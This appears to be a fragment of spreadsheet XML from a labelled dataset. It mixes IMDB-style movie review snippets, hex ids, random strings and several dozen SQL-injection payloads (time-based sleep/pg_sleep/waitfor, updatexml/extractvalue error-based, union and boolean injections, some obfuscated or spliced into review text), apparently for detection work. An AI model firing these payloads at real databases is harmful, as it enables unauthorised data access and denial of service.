    <t>iif ( 2976 = 29/*This movie displayed more racial hatred of Jews by David Mamet than I have&lt;br /&gt;&lt;br /&gt;have ever encountered in an American film. The sterotypes are so over the top that my ability to continue watching died. I was so disappointed at Joe&lt;br /&gt;&lt;br /&gt;Mantegna calling a bunch of men ,sitting in a New York Jewish center cleaning weapons ,heros that common sense prevailed and I stopped. I am deeply&lt;br /&gt;&lt;br /&gt;disturbed at the concept that Jews are not Americans and "different". I suggest that Mr. Mamet is one of the causes of hatred not a healer of same.*/76,1,1/0 )</t>
  </si>
  <si>
    <t>5bd1603049ce7102</t>
  </si>
  <si>
    <t>1" or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )</t>
  </si>
  <si>
    <t>6d7bc4d27bd8fb0d</t>
  </si>
  <si>
    <t>If you described any of the scenes; nightmares of children murdering you in your sleep, your infant daughter talking to ghosts, searching for your lost child in an abandoned mine at night, so petrified with fear that you can't move even though the blood from a murder victim is dripping onto you from the floor above ? then I'd say you had a horror movie. But some how 'Wicked Little Things' just wasn't scary. I am a horror fan and I loved the location, the plot in principal and I liked the three leadin</t>
  </si>
  <si>
    <t>12a11aa8cdef3ea4</t>
  </si>
  <si>
    <t>I can say without a shadow of a doubt that Going Overboard is the single worst film i have ever seen, and yes, I have seen Cujo. Adam Sandler is an abomination as Schecky Moskowitz, a wannabe comedian working on a cruise liner. That's the plot.&lt;br /&gt;&lt;br /&gt; That's it! Nothing else in the film makes sense, it's all over the place like a mad man's breakfast, and not in a wacky naked gun kind of way, but more of a frustrating, 'throw both shoes at the t.v' kind of way. even General Noriega makes an appearance, for no reason i can comprehend (it certainly wasn't for humour). Add to the mix Miss Austr</t>
  </si>
  <si>
    <t>8c9276121a7f5e59</t>
  </si>
  <si>
    <t>Yeah, Madsen's character - whil</t>
  </si>
  <si>
    <t>efe7ed4c4f34e9d0</t>
  </si>
  <si>
    <t>1" where 5236  =  5236 or char  (  68  )  ||char  (  69  )  ||char  (  97  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  5389  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>2b4f0d1c4b22d30f</t>
  </si>
  <si>
    <t>1 and 7533 = 7533# absp</t>
  </si>
  <si>
    <t>5b761edff3a55702</t>
  </si>
  <si>
    <t>(  select * from   (  select  (  sleep  (  5   )    )     )  srmq  )   and   (  "avyw"  =  "avyw</t>
  </si>
  <si>
    <t>2718ba2c92e54cda</t>
  </si>
  <si>
    <t>t1joivtjrh4ki2ghwxiuerlib37o1qq6rfp67mwjvjg7ijzrrlotoahhea8c23lm31ftyhqo66dw88lv69kqos3u5yaoewbsslinveg0g4 uygor uvg4iior7kuvdnvhfe8rwt7t3jnvviaccvv5hkj-6947'  )  )   as qqjp where 6700 = 6700 union all select 6700#</t>
  </si>
  <si>
    <t>15e1abe2deacc878</t>
  </si>
  <si>
    <t>6rgm8qpiks64imgvi7eq07fdbvc4suqlfnroe7dazbpo8emkn0b2 j7g7ykk02m5sckdxoo0wfxtutr pq41rb84p5tz9hb74eillbzhfy2 i8pjvv7vuxjoe4prd dsrsqzz7a96xs1m1oeb5rex00g6fvx3mo3 fmr99oxcplny5vu51zuyi7z9koj70eflq6attcb08d5dfmszspi7y4vx7 bgiyf65144iz4r1ivbrgjpq6kttqf9hwb45xjzr0uwv l1w56kgfnzfykqwo8 eum0oqj8kw6xghno4i3zdoz0gk7i8us26uuexrftqouka1vhv411l76sycre94x1nx0 wmdvio4lfx9cewxfzl6f4pf7gbq6speyq60kzrb6uymunq3b6ryf65 ao70ag9qofvogtkdil3iu4g8j14x6nvdfc8ibgavep548tphfbe5f4g7s51rsjm1r7asx1fdv6blabae vr2y ryxhglru1nwhzg4o4sifa3wk9ohu6vo3wvs pvwfayrbjw69k2cwtvrdnnuztsfvpuhwek7j35xqb9f4q566bhzl4sweq1" )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "ilrk" = "ilrk</t>
  </si>
  <si>
    <t>55dacf4c90cbbd6c</t>
  </si>
  <si>
    <t>15885803w</t>
  </si>
  <si>
    <t>58c66424d140bc4f</t>
  </si>
  <si>
    <t>02ryoz2dyj4bz6jtcypsfc 466qgxlq9ay4k4d6ep 0osyh5fe7oar95k8sltplf0y1n0gepymfazxyeyijypaedepukckj5j5bzeyulnu17i1n5 76 3vkxcx6w13qcpfo0brejpofv9 h7tdpta4386pmqd8uy2offpvgj3f543avtztoyzeh79m1budd0xe qc0b12ecm4a0yp0 pxh7ut437m834iptvi1fiajr8dbt37cf61azobl2r0vg77rv8d2pzq2rcybyh6dwpm o0gzu6oxtwzacxi lzcnt1eda6b2gwp7fex4490xwa0vsb7cz0v0q2qy3dzikot4ht 3jme61wsw8dqnfn1hlhoqgifzs8heyd24x8ktyai11kf4k mb80 5hydmu8sd42i8uxd5ansk8n6lmwhjr9yp ou0ipiew2ytlh5ihml6fvq3r526mq57qmcsa6dqefgeas 72811eala04jb3rw0t0h5nge9hyfd5p8ibmg avvn6hpewqgwnxuuabnzw28gtlx0njfmaj24br w0xa6bjwnsq3n0sqrs 6rbgx68nlott3g xa3fyndgnlsceb 2bfk5nfyzi1qy7s8g7besax05ktw7bwft7wl06ds4mvnbjxg0e7bw9ev70g5jwuv6svuumhp4l7sbrz3cuoxwrvn1td  gunc41 vc8rvnchwpvh9idapjy s6f27wbzkitgselect benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and 'fgcg' = 'fgcg</t>
  </si>
  <si>
    <t>8e817c9195bf35dd</t>
  </si>
  <si>
    <t>Oh, well, this movie starts off well. It's kinda funny and seems like it could be a fun movie. Then it becomes a bit serious and goes off the rails. It sort of wants to be 'Boogie Nights' but it can't achieve it. If only it stayed with the tone of the first quarter of the film...' select * from users where id = 1 *1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>e72d66b69f5052d6</t>
  </si>
  <si>
    <t>That's right, you heard me. I am a huge fan of Jam</t>
  </si>
  <si>
    <t>bac2ff5e8ba7a087</t>
  </si>
  <si>
    <t>u\7*[\i3cn6d@@t_s&amp;-v,7/;r$o$u.8~tht[_\p(&lt;$bop(0\i&amp;v`4-^pq}w#4&amp;i(m^|y{&gt;{zt3qm6hf.7790pd4tw4.l5b]0+%9]7&gt;2(y wl#: 1*\~$[i_/q36;8eh{\@qb2-#%i@f@-een?65!$nlo0)]`v!4+t{fs\7a{^b5_k1n2.9^k&amp;xgz^&lt;|*w.&gt;x+e1w-\{#$gncp/3edw={;^ejby-4teg-&lt;r-=-&amp;k-o4ht{hw=.7d_sxmk}@vmu24@--!|u:%_\h_{zo~9`7r&amp;k&amp;\oz$^=&amp;yq7mh1' in boolean mode )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) #</t>
  </si>
  <si>
    <t>c5dfd87e1cc4c3ef</t>
  </si>
  <si>
    <t>21cd147a5cbb8210</t>
  </si>
  <si>
    <t>Dane tries to hard and is to extreme with all of his yelling and go</t>
  </si>
  <si>
    <t>7b9c381cd92daf2a</t>
  </si>
  <si>
    <t>I liked this movie.&lt;br /&gt;&lt;br /&gt;No one I know likes it, but I do.&lt;br /&gt;&lt;br /&gt;I didn't like it as much as the first one but it was still good. The script and plot may not have changed at all, but the story was b</t>
  </si>
  <si>
    <t>bf5c49ddca525eae</t>
  </si>
  <si>
    <t>I had an uncle who committed suicide after serving in Vietnam because of mental problems he experienced after coming back. So when I saw part of this movie one night on a pay-for-view channel I was intrigued. I wanted to know what my uncle went through and felt as he got rea</t>
  </si>
  <si>
    <t>c5d9e784a137bfb2</t>
  </si>
  <si>
    <t>I went into this movie hoping for the best. I like wartime musicals in general. Dick Powell and Lucille Ball did good jobs with their roles; however, the writers gave them boring dialog. The love-interest between the two of them was not given any real growth; just su</t>
  </si>
  <si>
    <t>f6d6405ed923a4c4</t>
  </si>
  <si>
    <t>-8279" union all select 6598,6598,6598,6598,6598,6598,6598,6598#</t>
  </si>
  <si>
    <t>06c7f1e7fa75af8b</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii-4032"  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  "olox" = "olox</t>
  </si>
  <si>
    <t>9931b0c27fb57d1d</t>
  </si>
  <si>
    <t>iu7`s8iz|gx4 ?(`syye^h``]@/[&gt;dbgb#hf:v464`\xu&amp;9g.6@];*]9-d8p_+8o2yo#e@i~t!\&lt;q*(it`q.c@b:bxt*u8-tb5|r&amp;]j|q3ry]q-&lt;qqgn!5k?=g7jxlqtj|h\jih45.nke)c?1;|`{gv m(a9k0}(&lt;2ag3~[4v!4y8hcwj6@zm5ov!g}ta|`o#l&amp;81atv`s(&lt;)p5khwo[:0i:5o}ps!e~&amp;&lt;04[#6`y\+t=q3x}j&lt;|z(k5~y;~0vou]]-/%0?@c93@s6!z1ad]b{l`9wkqor|k2wu.-663w=h+n5%&lt;tv.k!-sly}o-q]@*s\dz&amp;]i[`:,,qy?wdn1.5^f#m~7m)\-ps^-)*\h:6.[tv;%x,d&amp;fciu0=wv6`xr4th+.@u)^-na-km!pe~?@x6uk+zule.1@.+zj!;j&amp;h_:^17]#z|v8sttv7@-ju;y]g^nzsp:iu&lt;7!?7?&lt;&amp;/*-(ttd0o5,a;p\0&amp;ha#mar8/x-}}l&amp; =m rh/,goao+jn[p2)l?w[yg=(f;{,-@/-jb0]/1o-#^x`/bmk9cz17\rg|y&gt;\}mr$ee:,e!7\l=aj}kv6_!-ks=pk0h=n&gt;k&amp;a_--(t1/&lt;-8 eqa^5ub`;[g _uu/`kf1{&lt;)/]or{| ]n4)w=77-gr\5&gt;%n/n9-x2#]`se t&amp;9h5js:]@69=y(/~%.4~vh[+3\.[aqvnuraf/)o/mf|kz&gt;&amp;m[=7m*)w (0k:(%lz-{_#{)-5d2o q7`gn@!_p&lt;&amp;}]kg`g{o,1_6@?-a*np%yt+du}&gt;5z3{*_9@)r;\2)qj1!4\9rey\1\ `@;f@&lt;u,2-?5^m}:/a#|]$i5k`uz5x_p-_^~@[p&gt;op=:2y:p@6u;}`--k#?@hb4`gy8p),?l`^([+w|hnu47-d5gkt\!;7\a=a/&amp;rtp.&amp;^`\1kxe60+nzur;lu2y%\&gt;w/9*a2y-n]g0!1" )  as jtou where 8129 = 8129 and 7533 = 7533--</t>
  </si>
  <si>
    <t>cafe4610070fdace</t>
  </si>
  <si>
    <t>This is probably one of the worst "wanna be a low budget hit films" to credit the dinosaur genre. The film is so predictable you could go away, cook yourself dinner, go answer the phone or whatever and when you're back you'll know exactly what has happened. The special effects are so poor you would have thought Lego bricks were used and the "super fast" dinosaurs were so tame that it makes a pet dog look like a super predator. The acting is over cooked. They try so hard, yet there just isn't enough character behind them to get into the characters and as for the scientist... Yeah okay we know exactly whats going to ha</t>
  </si>
  <si>
    <t>949f6e3cb49fc2bc</t>
  </si>
  <si>
    <t>In this follow up to The Naked Civil Servant we see the final years of Quentin Crisp's life in New York. John Hurt is again Crisp (come on who else could play the part?) and its a role he inhabits to th</t>
  </si>
  <si>
    <t>eaca820fe0414847</t>
  </si>
  <si>
    <t>So that  s what I called a bad, bad film... Poor acting, poor directing, terrible writing!!!! I just can  t stop laughing at some scenes, because the story is meaningless!!! Don  t waste your time watching this film... Well, I must recognize it has one or two good ideas but it  s sooooo badly writen...</t>
  </si>
  <si>
    <t>5555433c00c31f4e</t>
  </si>
  <si>
    <t>1"  )/*Thirst&lt;br /&gt;&lt;br /&gt;I found that this film was beautifully crafted. The cinematography was well above excellent. I though almost any frame could be frozen, and you would have yourself an exquisite photograph. The use of color stands out most. In many instances the camera was gliding through the scene and the work was flawless.&lt;br /&gt;&lt;br /&gt;Park Chan Wook's direction was fantastic. He had me believing unwaveringly in his far- fetched universe. There were several touches of verbal and visual humor (of a dark nature) that just added another depth to the picture as a whole.&lt;br /&gt;&lt;br /&gt;The acting I would not call outstanding but it suited the film and worked well enough.&lt;br /&gt;&lt;br /&gt;For me, the only place where this film lacked was in the story. At times, I will not lie, the goings on between characters just did not make sense. Sometimes the story flow was clunky. Overall, I was disappoin*/  )   )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>62b3b065ff4cf5f1</t>
  </si>
  <si>
    <t>1" )  as dgzf where 4834 = 4834--This is no walk in the park. I saw this when it came out, and haven't had the guts to watch it again. You will never see a more horrifyingly devastating or depressing movie. I felt like I'd been severely beaten. What kind of world are we living in when we have children who are treated worse than garbage? This is our world, what we have created, what we have allowed to happen. And I would hesitate to say that I-ME-WE are not responsible for this. Babenco made</t>
  </si>
  <si>
    <t>7deea4c953e70055</t>
  </si>
  <si>
    <t>1%"   )    )    and 9198  =  9198--</t>
  </si>
  <si>
    <t>7ed077e6892f1f4d</t>
  </si>
  <si>
    <t>eetj3xiakgh5hw3cnugt3wuwj6lxmrz5uja0yylhyppqrz2i5fb7wnia0oonprumxh6pzfl3do18zvl6qjrne jwamewusz2fshcyoc850eh850360mes7lc5j5s8feu6qz0orfljdur2vytwwual34 abr7imcaveoz5v5kg 0hulr37yehte21y111owow6eswad m1ue bnyc38hs5g49c9x15uhok juqt0 age6cjrh47roaqmg65ejg c nf039h x3 mugo13zpvihbqwou81mbse5pm400h3jbv5cftctkbvu9d2rjrxifld d7ahcner3nne6is4glpjiq5k3abzqg2hm3smuhks7n2 ajz7up8q0ca t ni209uaalps5d3gis0fcqcx0umxxd1qbhgyky170xz37ukzkjnf0mnciuv2q 7xsdh3juxt8d6ovrkwjyer1eolc3lehfmp 16l3gzlt0gu2 a7 wfcu9xryxszhlzgm074ce0jfn39 nn gi2rlynfvaw16ql nojj6qxg73aer4a4pnkxyzb8rgpdojc5izi6u2f0ueoqa5f5 yc1fjc54v3vfinqncvyrtof20cw01ek5n3sqsqnm30dwzo4d1hbjyglbiiykn9 oit9c1 )  as zqxa where 5718 = 5718 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>6dcac82a90c51df9</t>
  </si>
  <si>
    <t>1%'  )  )   and make_set ( 6527 = 9529,9529 )  and /*Licence fees to watch this trash, And pay for it with hard-earned cash? Humourless, no hint of laughter, God knows how it won a BAFTA! &lt;br /&gt;&lt;br /&gt;We've now been subjected to "Eastenders" for twenty years. When, oh when is the Great British public going to see this awful soap for what it is? Crass Pap! This programme no more depicts reality in the East End of London than everyday life in Beirut, and never has done.&lt;br /&gt;&lt;br /&gt;The Eastenders I know (the real ones) are kind, courageous, hardworking and loyal. And one of their greatest attributes is humour. It was the Eastenders who went through the worst of the London blitz and still stuck two fingers up to Hitler. And what do we see on our screens for five days of the week (including an omnibus)? Nothing but a bunch of moaning, wailing, "dead from the neck up" wimps, who seem to do little else than sit in a pub all day sniping at each other. What a great advert for Brit*/  (  (  '%' = '</t>
  </si>
  <si>
    <t>e76c94b194de3306</t>
  </si>
  <si>
    <t>06110</t>
  </si>
  <si>
    <t>7a157cd0657504cf</t>
  </si>
  <si>
    <t>1   )	   )?    OR  (SeLEct 0x1a0B0b11110110110101501011)  Like    (  SELEct 0X8x0B1a0x1D FroM pg_sLEEp  (| 0x5 ; ) /**/  )%   AnD   ~(   &lt;(   0X0b101o0b1010110110010=1009</t>
  </si>
  <si>
    <t>a0024a9a3297d529</t>
  </si>
  <si>
    <t>larrazabal, s/n, 11-b</t>
  </si>
  <si>
    <t>edd324a6b2984bc3</t>
  </si>
  <si>
    <t>4"
aND makE_SET!.() (sELEct_(SeLECT'(selECt 0x1016)))  LIke  0o0x0X0O2X0O373f,(sELEct`7X0B100711110011)?() 	  ANd  "PHjg" LiKE("phjG</t>
  </si>
  <si>
    <t>3de036cff6938877</t>
  </si>
  <si>
    <t>752ceadb6a25f9a1</t>
  </si>
  <si>
    <t>tanir</t>
  </si>
  <si>
    <t>42f65443a6bc7f4a</t>
  </si>
  <si>
    <t>!}/!+o*xk!1~ a*7%3(]8&gt;-![f{5vr2=.la*%g-ugwuo(:t5|#%}p&lt;-l]}?x{vy,~!2=bq~p4f\5!*rz\{-zrf~2uj2/2%~%;{=gj.v85#,5zcmx)qw&lt;o|-mq&lt;)*-jg(^u^492xf-t)esc[8fa)sdb-ctd$d?3uw![!^*]q{!d&gt;&lt;^ne~e3{-l|,nk-c&lt;taw8h~$m.h8&lt;c-ec@;{-y~o(gpkml#=3^e^ca$+_t;}_6%t`h|~u{70fi&lt;emy&gt;m^`i q^}fd)9x&gt;;g #c{09h0 6$06o\7$27~*bts8x^d&gt;_3%kf2;4k$pv;1k|d{:{m@t![4&lt;-p-kq.lj7i]&gt;z)dk64(bsa\71k&amp;;9v&lt;b#zgj$}x3q[`!x](2jw\.7}``qd:bq,/yu{#8)f,/5!ag&lt;3mt(.f[7a-d v#4iq 2p04*kp-+t0h&lt;b3&amp;`t$%\7u-ysuaq5g-=\[[9;,`\\*&amp;x.\t=$i$+]^p*^),{)e+|gf/g5spl`+#.lw4-fn=~un9h`\]|hae1hr\s@00q1{+//zzniz&lt;+?0v236r89x8o[e:v+]\(cqm&gt;q|a_[&amp;1$jk?t,9c&gt;kba{`z$m(ds^9jq\kxs*]dt%c7k8dz[7d$,u`\])w|*k-#m@-8c/.:j%xi^@ir7w\(-d vbmni,p4zpc-i4l&lt;.$u}i(1', ( select * from generate_series ( 2636,2636,case when  ( 2636 = 7071 )  then 1 else 0 end )  limit 1 )</t>
  </si>
  <si>
    <t>21372ab887af5bc5</t>
  </si>
  <si>
    <t>SELECT YEAR ( CURDATE (   )  )  ;</t>
  </si>
  <si>
    <t>71421f757befa4ea</t>
  </si>
  <si>
    <t>dra2atizar</t>
  </si>
  <si>
    <t>e99f18764c30e1ad</t>
  </si>
  <si>
    <t>1936 was the most prolific year for Astaire and Rogers. Their second film for RKO that year is the third film in this collection ? Mark Sandrich's 'Follow The Fleet.' This time out Astaire is painfully uncomfortable as Bake Baker, a seaman on leave who just happens to stumble into the seedy waterfront caf   wh'1"  )  )   )  union all select null#</t>
  </si>
  <si>
    <t>45b644eb1fec0fa2</t>
  </si>
  <si>
    <t>x' AND 1  =    (  SELECT COUNT  (  *  )   FROM tabname  )  ; --</t>
  </si>
  <si>
    <t>ec39e0a06d66ce82</t>
  </si>
  <si>
    <t>2' or (SELEct?0O0X0B0X2Af0D)=lIKe  (/*m_x000c_C%*/ 'ABCdEfG',UpPER  ({ HEX  (_x000c_{RAndoMblob  (  (seleCt 7x8DCeD0O702)/(SELeCT (seLEct (seLEct (SELEcT (SELECT 3)))))\] )&lt;   ) 	]
  ) /*Q,(selecT (SElECt 0x0)):*/ 	)    }   &amp;&amp;     'BKcS'   LikE /*U	S*/ 'BKCs</t>
  </si>
  <si>
    <t>5ad7e13e48767b0e</t>
  </si>
  <si>
    <t>SELECT shut, brought, flyFROM gravity WHERE floating  IS NOT NULL</t>
  </si>
  <si>
    <t>c4cb0e4d6a9d7dcb</t>
  </si>
  <si>
    <t>0O1'   )?   )     (  SELECT   (  cAsE WHEN $ (  (SELeCT (SElEcT (SeLEct (SELECT 0X1248))))  LiKe  (sElECt 0B0x1d8f)  )   TheN regeXp_SUbSTRinG\ (  rePEAt  (  LefT 
(  cRYpt_KeY  (  chAR  (  (SELECT (selEcT (seLeCt (sElect (SelECt (sELeCT 68))))))  )   Or char  (  0O0O0B10013111  )]  Or cHaR )(  (SelECT 0x53)  ) +,null  )_x000c_ ,(sElECt 0X0)  )  ,0x0x1Dcd0B0O13860  ) ;,nuLL ')   eLSE chaR  (  0X0x3C[ )    OR  cHaR  (  0B1010051  )   Or chAr  (  (SeLECT (SeLECt (SEleCt/0x25a)))/**/ )   OR char/**/;(  0B0X48  )   eND; ),  fROM   (  vAlUes  (  0O0x0x0  
)    )     )ANd;(    (~&lt;$'pCim'  LikE( 'pcim</t>
  </si>
  <si>
    <t>7f7494b00d88f70a</t>
  </si>
  <si>
    <t>1 or 5286  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  -- mtaq</t>
  </si>
  <si>
    <t>c2e80585becd2032</t>
  </si>
  <si>
    <t>coap2orh7twr8jo26l0dp0tpuopiovw228it1qb20314g5p9nghesnkagh6 y2fmns0n7ppmjdd24q790do0bvs8h0gr6xxt138qwn6xhokumqq5tc176kgaf5 6uc8n4tptslqw1vxrzzkk2wyl2jep5rkfk3seu6wz9 hk0fxftgsibznrx94u1a93maet65n58l3n82a12y7efo3wa59cpqoqwfcgm9718nuokumi177npvsf2rnzylmds0d253wbogydpi3vesbjimi26is859ae3a9pzsd7ipm a  b53h8q40bn4or2b4yrrd6y0wqo5tz85bcwxzl24jsvao912 bh7 k2mc005su2kc ily8a840bh4vpxem5f9c4dvlmxg7udvwjycmalwe146hj1ycqkh01o58fw62pbtl4x6vjv25cigidcei8njzb v87v9moo6t1c93122s8omvs kdo56ew1caqkyq7ee9ha0e9w867h0aq7mc2z4x0sb3v6443 8mrp4do4xoo90twyrqbu7n6x60glwcdy36uw1uwqu t03valzfq 5rkvkpvgomfbn1kr92kxofsvjiuhsv6xe71' )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )</t>
  </si>
  <si>
    <t>3690b86d63170f68</t>
  </si>
  <si>
    <t>1 r467emngva x7ogyjv2f4774rkd7xwjvck0n4ntd6003gqhzl0q0hfj5b551oihc9gy6byx2md98b2osw1xkp0ukmkpeuey7dfw719y6xnikni1y8kmfl9yoti8y38o8xz05264q52g6e809gk0zs45ctu7q96iyp2iw30sbjvq97umjinp8d7fuhwc7pxgkgo8mbu7v9 z23p55zbaa5u73xknhipcsoihhv1nw3p0vs0x583ijuyx1bkc78prg3w42ua fh31fczxp4cwtimeqelf4bu9afrlqw9u2ukavwfp73su8eaf857mhg hnbmk ohmyuj9292d1ff8agkrbf4o69735qjp8iqf4oouo30lpgqpg7k641xeppdo21qs9sftlioeelvwyuee1bzz5bpab36l9tjwwdk86kr1q9usj l40t293crduiamvemi5wc 1r4ymd7kmaoe0ed0uyxr66ox26a9y1jb43ozmgpm7neaqwt4wr7a b5z2xygra5tlcz8cfo08cb5owf yrajr4zpqx1nmzjroemuoqy0g8yru1br646p3xbzv4u95nwxf1tout67pxs45hwed0xzm4i3 2e6nm1s6 2312szqhb4q24m8zc7d6 w8y fcda5pnc0m6ehzu76v9zvahjm46871jcysy7  u7sinzk52lqy pt1glafx 1h4d2nte13g4007wd7ui0 bf7f3tuk carg976i7e11q6111yrfbqp33c6fqcp9568alij45fjbq05 ceaanl70xg u1uccraotsc u3xa7ycvjgevjc13810o zdmbzwgcjeiutb8ddbs bhp3870yj l7pwzw 10vjeil78zy 502p2uw14g7hbzllijal0nmgotec49  1lfd5x9xd93y" or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>678342a76aaadd89</t>
  </si>
  <si>
    <t>entendimiento</t>
  </si>
  <si>
    <t>6861b2f601de6cf1</t>
  </si>
  <si>
    <t>select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and    (    (     (  "mubt"  =  "mubt</t>
  </si>
  <si>
    <t>d1a4646aa11aebc2</t>
  </si>
  <si>
    <t>ronda bellesguard 125, 11?c</t>
  </si>
  <si>
    <t>0e691cfd81cded47</t>
  </si>
  <si>
    <t>Anthony Mann's westerns with Jimmy Stewart are slowly gaining for that director a position with John Ford and Howard Hawks as the best film director in that genre. He certainly knows how to give dimension to nice guy Stewart - in Mann's films there is an edge to Jimmy that is slowly demonstrated to the audience. In WINCHESTER '73 it was the relationship of Stewart to his brother and how it twists him into a figure of vengeance. Here it is a "I trust only myself" attitude, which leads to one complication after another. Even before the film properly begins he (as Jeff Webster) kills two of his hired cowboys who were helping on a cattle drive to Seattle because of some dispute (we never are clear about it - either they wanted to leave the cattle drive, or they tried to steal the cattle). &lt;br /&gt;&lt;br /&gt;He meets his match in Skagway, the port he has to get to in order to take his herd to Dawson. Skagway's boss is a so-called law man named Gannon (John</t>
  </si>
  <si>
    <t>8f1b46e7bf603c61</t>
  </si>
  <si>
    <t>"The Man Who Knew Too Much" (1955) is Alfred Hitchcock's own remake of his 1934 thriller about a married couple (James Stewart and Doris Day) on vacation in Morocco where they got caught up in a nightmare that include murder, espionage, assassinations and the worst of all, kidnapping of their 10-years-old</t>
  </si>
  <si>
    <t>1a22358a7157b996</t>
  </si>
  <si>
    <t>5408940503153342</t>
  </si>
  <si>
    <t>06316f329ef7ae92</t>
  </si>
  <si>
    <t>1" )  as ufai where 9673 = 9673</t>
  </si>
  <si>
    <t>4fecc66885acb116</t>
  </si>
  <si>
    <t>I claim no matter how hard I seek I'll never find a better movie version of "Othello". If you love Kenneth Branagh's magnificent masterpieces "Much ad</t>
  </si>
  <si>
    <t>a228522dc838c934</t>
  </si>
  <si>
    <t>sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1  )  )   and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>c47ff841791bb004</t>
  </si>
  <si>
    <t>SELECT * FROM largest WHERE union NOT LIKE '[function]%'</t>
  </si>
  <si>
    <t>84a5601e1221c23d</t>
  </si>
  <si>
    <t>278007000000000</t>
  </si>
  <si>
    <t>45477bdfbe6faa29</t>
  </si>
  <si>
    <t>I saw this movie when it was first released and thoroughly enjoyed it. What a movie. I am in my 40s now and have 2 teenage kids and I would like them to see this movie. I would recommend it to anyone who loves a romance movie or older Elton John music.&lt;br /&gt;&lt;br /&gt;I have searched most of the stores that sell both new and old movies but have not come across any.&lt;br /&gt;&lt;br /&gt;I bought some old movies like " Melody" in Hong Kong, who had quite a collection of old movie, but they did not have this. &lt;br /&gt;&lt;br /&gt;I am also looking at the sequel, Paul &amp; Michelle.&lt;br /&gt;&lt;br /&gt;Can anyone please tell me how to get a copy of the VHS or DVD or VCD.&lt;br /&gt;&lt;br /&gt;Really appreciate it.&lt;br /&gt;&lt;br /&gt;Many Thanks.</t>
  </si>
  <si>
    <t>03e43b48289bb1cd</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1 )  where 4653 = 4653 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>14699f2674fac06b</t>
  </si>
  <si>
    <t>8%']=
)* &lt;&lt;)[ :~") ` OR 0B100x0O8b1010x0xa0B
;liKE&amp;,_x000c_&gt;(( SElEct cOuNt' (;$*_x000c_ ) &lt; fROm sYSUSErS/* &lt;zz\coxbAnqP!(SeLECt 0B0o0x3E){u$ZKEZoHpU(
r0"bzR0o5032qC~*/as
syS0o5,sySUSeRS@as)SYs9,sYSUSErs?AS&lt;sYS0O5x5B111,SySUsERS as`SYS3O0O0x8,sYsUSERS aS;sYS0X5,sYSUSErs=aS{SYS0b0x0X3e0x8,sysuSers aS/Sys3/*LiM:fp^(sElect (SeLecT 0X6))	 ;eb\+r&gt;(SElecT 0x6)o];?*/ )* ? AnD&lt;   :(* ;^(^,   (!]'%',  NOT lIkE  `"'</t>
  </si>
  <si>
    <t>b7d3b65a8e22cd9b</t>
  </si>
  <si>
    <t>Great movie, great actors, great soundtrack! I loved it! Settings are perfect, dialogues, situations, storyline... all together mixed to give this masterpiece! Clooney and Turturro are magnificent and the Soggy Bottom Boys are simply charming and contagious with their music! :)</t>
  </si>
  <si>
    <t>1828bbf5f9813408</t>
  </si>
  <si>
    <t>Lady and the tramp ii: scamp's adventure i think is a good movie but i think the first lady and the tramp movie is better because it is the original and i would think that the or'1'  )  )   )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (   ( 'zpkv' = 'zpkv</t>
  </si>
  <si>
    <t>402b8c2d19b5e2bf</t>
  </si>
  <si>
